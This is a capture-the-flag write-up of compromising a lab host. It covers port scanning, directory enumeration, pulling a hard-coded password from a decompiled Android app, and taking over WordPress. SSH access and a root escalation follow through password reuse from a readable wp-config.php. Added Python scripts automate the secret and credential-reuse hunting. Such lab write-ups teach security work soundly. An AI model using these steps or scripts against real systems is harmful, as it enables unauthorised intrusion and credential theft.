HIH | HAC_CTF

In this post, I demonstrate the steps I took to fully compromise the host provided in the CTF challenge by the Hackers Improve Here community.

2 months ago   •   10 min read

By 0xBEN

Nmap Results

# Nmap 7.92 scan initiated Mon Jul 18 12:13:43 2022 as: nmap -T5 -p- -oA scan hacctf.local
Nmap scan report for hacctf.local (10.9.9.49)
Host is up (0.00031s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
10250/tcp open  unknown
10257/tcp open  unknown
10259/tcp open  unknown
16443/tcp open  unknown
25000/tcp open  icl-twobase1

# Nmap done at Mon Jul 18 12:13:45 2022 -- 1 IP address (1 host up) scanned in 2.43 seconds





Service Enumeration

TCP/80

As part of the challenge, the CTF creator instructed participants to add hacctf.local to their local hosts file. After adding the hosts entry and evaluating the nmap results, I decide to zero in on TCP/80, since that's usually a reliable entry point. The remaining ports (10250, 10257, 10259, 16443 and 25000) are the kubelet, kube-controller-manager, kube-scheduler, API server and cluster-agent ports of a MicroK8s installation, which the process list later confirms; worth noting, but a web server is the cheaper place to start.

Gobuster Enumeration

gobuster dir -u http://hacctf.local -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html -o gobuster-enum.txt

/.htaccess            (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess.html       (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.htpasswd.html       (Status: 403) [Size: 277]
/assets               (Status: 301) [Size: 313] [--> http://hacctf.local/assets/]
/index.html           (Status: 200) [Size: 1156]                                 
/robots.txt           (Status: 200) [Size: 31]                                   
/server-status        (Status: 403) [Size: 277]                                  
/wordpress            (Status: 301) [Size: 316] [--> http://hacctf.local/wordpress/]

curl -s http://hacctf.local/robots.txt

/creds.html
/supersecret.html
Both /creds.html and /supersecret.html just redirect to YouTube, so they are decoys and I move on.





WordPress

The WordPress site mentions an Android app that is in development, so there should be some place to download it and analyze it. Let's take a look at the /assets folder discovered above in the Gobuster enumeration.

Download the APK file from /assets and decompile it for inspection (apktool decodes the compiled resources back into plain XML; jadx does the same for the Java code).

Try a case-insensitive search for the keyword password in the decompiled directory.

The file ./res/values/strings.xml looks most interesting to me: it is where an Android app's string resources live, so it is the natural place for a hard-coded value left there by the developer to turn up.
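To make the resource-grep step repeatable, here is an added example (my own script, not part of the original post or of the CTF app) that walks an apktool or jadx output directory, parses every res/values*/strings.xml and flags resource names or values that look like credentials. The scan functions, the patterns and the sample strings.xml it builds in a temp directory are all constructed for illustration; the sample's wp_password value is a placeholder, not the string found on the host.

```python
"""Scan a decoded APK tree for hard-coded secrets in string resources.

Added example, not from the original post. Point scan_decoded_apk() at the
output directory of `apktool d app.apk` (or a jadx export) on a real target.
"""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Resource names that commonly carry developer-left credentials.
SUSPICIOUS_NAME = re.compile(
    r"(user(name)?|pass(word|wd)?|secret|api[_-]?key|token|auth)", re.I
)
# Values that look like an API key / token / long random secret, whatever the name.
SUSPICIOUS_VALUE = re.compile(r"^[A-Za-z0-9_\-]{20,}$")


def scan_strings_xml(path):
    """Return (name, value) pairs from one strings.xml that look like secrets."""
    hits = []
    root = ET.parse(path).getroot()
    for el in root.iter("string"):
        name = el.get("name", "")
        value = (el.text or "").strip()
        if not value:
            continue
        if SUSPICIOUS_NAME.search(name) or SUSPICIOUS_VALUE.match(value):
            hits.append((name, value))
    return hits


def scan_decoded_apk(directory):
    """Walk every res/values*/strings.xml (values, values-en, ...) under a decoded APK."""
    findings = {}
    for dirpath, _dirs, files in os.walk(directory):
        if "strings.xml" in files and os.path.basename(dirpath).startswith("values"):
            path = os.path.join(dirpath, "strings.xml")
            hits = scan_strings_xml(path)
            if hits:
                findings[os.path.relpath(path, directory)] = hits
    return findings


# Constructed sample resembling apktool output; the password value is a placeholder.
SAMPLE_STRINGS_XML = """<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">HAC Notes</string>
    <string name="wp_user">admin</string>
    <string name="wp_password">EXAMPLE-not-the-real-value</string>
    <string name="welcome">Welcome back</string>
</resources>
"""


def build_sample_tree():
    """Write the constructed strings.xml into a temp dir shaped like a decoded APK."""
    base = tempfile.mkdtemp(prefix="apk-")
    values = os.path.join(base, "res", "values")
    os.makedirs(values)
    with open(os.path.join(values, "strings.xml"), "w") as f:
        f.write(SAMPLE_STRINGS_XML)
    return base


if __name__ == "__main__":
    tree = build_sample_tree()
    for rel, hits in scan_decoded_apk(tree).items():
        for name, value in hits:
            print(f"{rel}: {name} = {value!r}")
```

The name pattern catches the common case (a resource literally called something like wp_password); the value pattern is a fallback for API keys stored under innocent names. On a real app also grep the decompiled Java/smali for the same keywords, since some developers keep credentials in code rather than resources.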

If I had to guess, this is likely the logon password for the WordPress installation. The username for the WordPress installation should match the article author – admin. Let's see if I can log into the WordPress admin panel at http://hacctf.local/wp-admin.

I'm in.

I take a look around and first check the plugin editor for a writable plugin file into which I could drop a PHP reverse shell, but the files don't appear to be writable.

Next, I take a look at the posts and find a draft post that contains an SSH credential for the user hailey.





Exploit

An in-development Android application – exposed in a publicly available web directory – yielded a hard-coded password. Due to credential re-use, this exposed the admin interface of the local WordPress installation, which contained a user credential for SSH access.

I should be able to SSH as hailey .

ssh hailey@hacctf.local





Post-Exploit Enumeration

hailey's login shell is /bin/sh (see /etc/passwd below), so run /bin/bash to get a better shell.

Current User

$ id
uid=1002(hailey) gid=1002(hailey) groups=1002(hailey)
$ groups
hailey
$ sudo -v
Sorry, user hailey may not run sudo on hac-ctf.



OS & Kernel

hailey@hac-ctf:~$ cat /etc/os-release 
NAME="Ubuntu"
VERSION="20.04.4 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.4 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
hailey@hac-ctf:~$ uname -a
Linux hac-ctf 5.4.0-110-generic #124-Ubuntu SMP Thu Apr 14 19:46:19 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux



Users

hailey@hac-ctf:~$ cat /etc/passwd | grep -E '100\w'
hac:x:1000:1000:hac:/home/hac:/bin/bash
ftpuser:x:1001:1001::/home/ftpuser:/bin/sh
hailey:x:1002:1002::/home/hailey:/bin/sh
zara:x:1003:1003::/home/zara:/bin/sh



Groups

hailey@hac-ctf:~$ cat /etc/group | grep -E '100\w'
hac:x:1000:
ftpuser:x:1001:
hailey:x:1002:
zara:x:1003:



Network

Interfaces
ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
    link/ether 3a:9b:bf:76:73:50 brd ff:ff:ff:ff:ff:ff


ARP Table
N/A


Routes
N/A


Open Ports

The loopback-only listeners are MySQL (3306 and its X protocol port 33060) and what look like MicroK8s component ports (kubelet and kube-proxy health/metrics endpoints and the dqlite backend). None of them are reachable from the attacking machine, but the database is worth remembering once credentials turn up.
ss -tanup | grep -i listen | grep 127\.0\.0\.1
tcp   LISTEN    0      70              127.0.0.1:33060            0.0.0.0:*
tcp   LISTEN    0      4096            127.0.0.1:10248            0.0.0.0:*
tcp   LISTEN    0      4096            127.0.0.1:10249            0.0.0.0:*
tcp   LISTEN    0      151             127.0.0.1:3306             0.0.0.0:*
tcp   LISTEN    0      4096            127.0.0.1:10256            0.0.0.0:*
tcp   LISTEN    0      4096            127.0.0.1:19001            0.0.0.0:*
tcp   LISTEN    0      4096            127.0.0.1:39385            0.0.0.0:*
tcp   LISTEN    0      4096            127.0.0.1:1338             0.0.0.0:*


Ping Sweep
N/A



Processes

root         722  0.0  0.3 239292  5920 ?        Ssl  16:12   0:00 /usr/lib/accountsservice/accounts-daemon
root         728  0.0  0.1   6812  2620 ?        Ss   16:12   0:00 /usr/sbin/cron -f
root         734  0.0  0.1  81824  3232 ?        Ssl  16:12   0:00 /usr/sbin/irqbalance --foreground
root         738  0.0  0.6  29656 12640 ?        Ss   16:12   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         740  0.0  0.2 236436  5596 ?        Ssl  16:12   0:00 /usr/lib/policykit-1/polkitd --no-debug
root         746  0.0  0.1   7500  3348 ?        Ss   16:12   0:02 /bin/bash /snap/microk8s/3272/apiservice-kicker
root         748  0.0  0.1   6972  3028 ?        Ss   16:12   0:00 /bin/bash /snap/microk8s/3272/run-cluster-agent-with-args
root         749  0.5  1.0 1495428 19932 ?       Ssl  16:12   0:14 /snap/microk8s/3272/bin/containerd --config /var/snap/microk8s/3272/args/containerd.toml --root /var/snap/microk8s/common/var/lib/containerd --state /var/snap/microk8s/common/run/containerd --address /var/snap/microk8s/common/run/containerd.sock
root         754  3.4 11.2 1776280 217396 ?      Ssl  16:12   1:34 /snap/microk8s/3272/bin/k8s-dqlite --storage-dir=/var/snap/microk8s/3272/var/kubernetes/backend/ --listen=unix:///var/snap/microk8s/3272/var/kubernetes/backend/kine.sock:12379
root         758  8.1 20.7 2384368 400448 ?      Ssl  16:12   3:45 /snap/microk8s/3272/kubelite --scheduler-args-file=/var/snap/microk8s/3272/args/kube-scheduler --controller-manager-args-file=/var/snap/microk8s/3272/args/kube-controller-manager --proxy-args-file=/var/snap/microk8s/3272/args/kube-proxy --kubelet-args-file=/var/snap/microk8s/3272/args/kubelet --apiserver-args-file=/var/snap/microk8s/3272/args/kube-apiserver --kubeconfig-file=/var/snap/microk8s/3272/credentials/client.config --start-control-plane=true
root         763  0.0  0.0   4644   112 ?        Ss   16:12   0:00 /bin/sh /snap/nextcloud/31033/bin/delay-on-failure mdns-publisher nextcloud
root         764  0.0  0.0   4644  1104 ?        Ss   16:12   0:00 /bin/sh -e /snap/nextcloud/31033/bin/start_mysql
root         765  0.0  0.0   4644   964 ?        Ss   16:12   0:00 /bin/sh /snap/nextcloud/31033/bin/nextcloud-cron
root         766  0.0  0.0   4644  1088 ?        Ss   16:12   0:00 /bin/sh -e /snap/nextcloud/31033/bin/nextcloud-fixer
root         767  0.0  0.0   4644  1004 ?        Ss   16:12   0:00 /bin/sh /snap/nextcloud/31033/bin/start-php-fpm
root         768  0.0  0.0   4644   836 ?        Ss   16:12   0:00 /bin/sh /snap/nextcloud/31033/bin/start-redis-server
root         769  0.0  0.0   4644  1052 ?        Ss   16:12   0:00 /bin/sh /snap/nextcloud/31033/bin/renew-certs
root         770  0.2  1.2 948284 23372 ?        Ssl  16:12   0:07 /usr/lib/snapd/snapd
root         772  0.0  0.3  16612  7260 ?        Ss   16:12   0:00 /lib/systemd/systemd-logind
root         774  0.0  0.4 394880  7956 ?        Ssl  16:12   0:00 /usr/lib/udisks2/udisksd
root         786  0.0  0.0      0     0 ?        I    16:12   0:00 [kworker/0:4-kdmflush]
root         807  0.0  0.0   5828  1628 tty1     Ss+  16:12   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root         885  0.0  0.2  12172  5736 ?        Ss   16:12   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root         934  0.0  0.2 314456  5336 ?        Ssl  16:12   0:00 /usr/sbin/ModemManager
root         953  0.0  0.6 107912 11932 ?        Ssl  16:12   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root        1094  0.0  0.8 228224 15668 ?        Ss   16:12   0:00 /usr/sbin/apache2 -k start
root        1314  0.0  0.2 1101752 4740 ?        Sl   16:12   0:00 /snap/microk8s/3272/bin/cluster-agent --bind 0.0.0.0:25000 --keyfile /var/snap/microk8s/3272/certs/server.key --certfile /var/snap/microk8s/3272/certs/server.crt --timeout 240
root        1399  0.0  0.1 1080108 3624 ?        Sl   16:12   0:00 mdns-publisher nextcloud
root        1520  0.1  0.1  59844  3148 ?        Sl   16:12   0:04 redis-server unixsocket:/tmp/sockets/redis.sock
root        1647  0.0  0.0   2488   580 ?        S    16:12   0:00 bpfilter_umh
root        1917  0.0  0.0   4644   804 ?        S    16:12   0:00 /bin/sh /snap/nextcloud/31033/bin/mysqld_safe --defaults-file=/snap/nextcloud/31033/my.cnf --datadir=/var/snap/nextcloud/31033/mysql --pid-file=/tmp/pids/mysql.pid --lc-messages-dir=/snap/nextcloud/31033/share --socket=/tmp/sockets/mysql.sock
root        2176  0.2  6.1 1555768 117772 ?      Sl   16:12   0:06 /snap/nextcloud/31033/bin/mysqld --defaults-file=/snap/nextcloud/31033/my.cnf --basedir=/snap/nextcloud/31033 --datadir=/var/snap/nextcloud/31033/mysql --plugin-dir=/snap/nextcloud/31033/lib/plugin --lc-messages-dir=/snap/nextcloud/31033/share --log-error=../logs/mysql_errors.log --pid-file=/tmp/pids/mysql.pid --socket=/tmp/sockets/mysql.sock
root        2187  0.0  0.0      0     0 ?        I<   16:12   0:00 [dio/dm-0]
root        2249  0.0  0.0   4548   632 ?        S    16:12   0:00 sleep 1d
root        2343  0.0  0.8 341208 17188 ?        Ss   16:12   0:00 php-fpm: master process (/snap/nextcloud/31033/config/php/php-fpm.conf)
root       30452  0.0  0.0      0     0 ?        I    16:42   0:00 [kworker/u4:2-events_unbound]
root       31651  0.0  0.0      0     0 ?        I    16:44   0:00 [kworker/0:0-events]
root       34058  0.0  0.0      0     0 ?        I    16:48   0:00 [kworker/u4:1-events_power_efficient]
root       35097  0.0  0.4  13924  8700 ?        Ss   16:49   0:00 sshd: hailey [priv]
hailey     35119  0.0  0.4  18500  9012 ?        Ss   16:49   0:00 /lib/systemd/systemd --user
root       35122  0.0  0.0      0     0 ?        I    16:49   0:00 [kworker/1:0-events]
hailey     35124  0.0  0.1 169012  3592 ?        S    16:49   0:00 (sd-pam)
hailey     35280  0.0  0.2  13924  5664 ?        S    16:49   0:00 sshd: hailey@pts/0
hailey     35281  0.0  0.0   2608  1668 pts/0    Ss   16:49   0:00 -sh
hailey     36235  0.0  0.2   8524  5340 pts/0    S    16:51   0:00 /bin/bash
root       38730  0.0  0.0      0     0 ?        I    16:54   0:00 [kworker/0:1-kdmflush]
root       39617  0.0  0.0      0     0 ?        I    16:56   0:00 [kworker/1:1]
root       40881  0.0  0.0   4548   828 ?        S    16:58   0:00 sleep 5m
root       40913  0.0  0.0      0     0 ?        I    16:58   0:00 [kworker/u4:0-events_unbound]
root       41427  0.0  0.0   7520   240 ?        S    16:58   0:00 sleep 5
root       41435  0.0  0.0   4548   836 ?        S    16:58   0:00 sleep 1
root       41436  0.0  0.0   4548   836 ?        S    16:58   0:00 sleep 1
hailey     41437  0.0  0.1   8888  3180 pts/0    R+   16:58   0:00 ps aux



Scheduled Tasks

None



Interesting Files

/var/www/html/wordpress/wp-config.php
/** MySQL database username */
define( 'DB_USER', 'hac' );

/** MySQL database password */
define( 'DB_PASSWORD', 'supersecurepassword' );





Privilege Escalation

The WordPress configuration file is world-readable and contains the credentials of the database user hac. That user also exists as a local account (uid 1000, the first account created on the box), and because the password is reused, I am able to switch user to hac, who has passwordless sudo.
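As an added example (not from the original post), the following script automates the check that led to root here: find wp-config.php files, test whether they are world-readable, pull DB_USER and DB_PASSWORD out of the define() calls, and report whether the DB user is also a local account in /etc/passwd. It exercises itself against a constructed wp-config.php (reusing the DB_USER and DB_PASSWORD values shown above) and a constructed passwd file in a temp directory; the function names and the report format are my own.

```python
"""Audit readable wp-config.php files for DB credentials reused as local accounts.

Added example, not from the original post. On a real host call
audit("/var/www") (or "/") with the default passwd path.
"""
import os
import re
import stat
import tempfile

# Matches define( 'DB_USER', 'hac' ); with either quote style and loose spacing.
DEFINE_RE = re.compile(
    r"""define\(\s*['"](DB_USER|DB_PASSWORD|DB_HOST)['"]\s*,\s*['"]([^'"]*)['"]\s*\)"""
)


def parse_wp_config(path):
    """Return {'DB_USER': ..., 'DB_PASSWORD': ..., 'DB_HOST': ...} from a wp-config.php."""
    with open(path) as f:
        return dict(DEFINE_RE.findall(f.read()))


def is_world_readable(path):
    """True when the 'other' read bit is set, i.e. any local user can read it."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def local_users(passwd_path="/etc/passwd"):
    """Set of account names from a passwd file."""
    users = set()
    with open(passwd_path) as f:
        for line in f:
            if line.strip() and not line.startswith("#"):
                users.add(line.split(":", 1)[0])
    return users


def audit(root, passwd_path="/etc/passwd"):
    """One finding per wp-config.php under root that we can read."""
    users = local_users(passwd_path)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "wp-config.php" not in files:
            continue
        path = os.path.join(dirpath, "wp-config.php")
        try:
            creds = parse_wp_config(path)
        except OSError:
            continue  # not readable by the current user; nothing to learn
        findings.append({
            "path": path,
            "world_readable": is_world_readable(path),
            "db_user": creds.get("DB_USER"),
            "db_password": creds.get("DB_PASSWORD"),
            "db_user_is_local_account": creds.get("DB_USER") in users,
        })
    return findings


# Constructed sample input: the defines mirror the ones found on the CTF host,
# the passwd lines are a subset of the enumeration output above.
SAMPLE_WP_CONFIG = """<?php
/** MySQL database username */
define( 'DB_USER', 'hac' );

/** MySQL database password */
define( 'DB_PASSWORD', 'supersecurepassword' );
define( 'DB_HOST', 'localhost' );
"""
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "hac:x:1000:1000:hac:/home/hac:/bin/bash\n"
    "hailey:x:1002:1002::/home/hailey:/bin/sh\n"
)


def build_sample():
    """Lay out the constructed files in a temp dir and return (root, passwd_path)."""
    base = tempfile.mkdtemp(prefix="wp-")
    web = os.path.join(base, "var", "www", "html", "wordpress")
    os.makedirs(web)
    cfg = os.path.join(web, "wp-config.php")
    with open(cfg, "w") as f:
        f.write(SAMPLE_WP_CONFIG)
    os.chmod(cfg, 0o644)  # world-readable, as on the CTF host
    passwd = os.path.join(base, "passwd")
    with open(passwd, "w") as f:
        f.write(SAMPLE_PASSWD)
    return base, passwd


if __name__ == "__main__":
    root, passwd = build_sample()
    for finding in audit(root, passwd):
        print(finding)
        if finding["db_user_is_local_account"]:
            print(f"try: su {finding['db_user']}  (then sudo -l)")
```

A positive "db_user_is_local_account" only says the names collide; whether the password is actually reused still has to be tried with su or ssh. The fix on the defending side is the same either way: chmod 640 with the file owned by the web server group, and a dedicated database account whose password is not shared with any Unix user.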





Persistence

N/A





Flags

Hailey
hac{4NDr01D_4ND_w0RdPr355_801_1337}


Root
hac{w3lL_doN3_Ama21N9_h3K3r_aNDRo1D_n_LUA_fuN}

Judging by the flag, I achieved root via an unintended path (seems like a Lua script should have been used somewhere). Oh well, root is root.
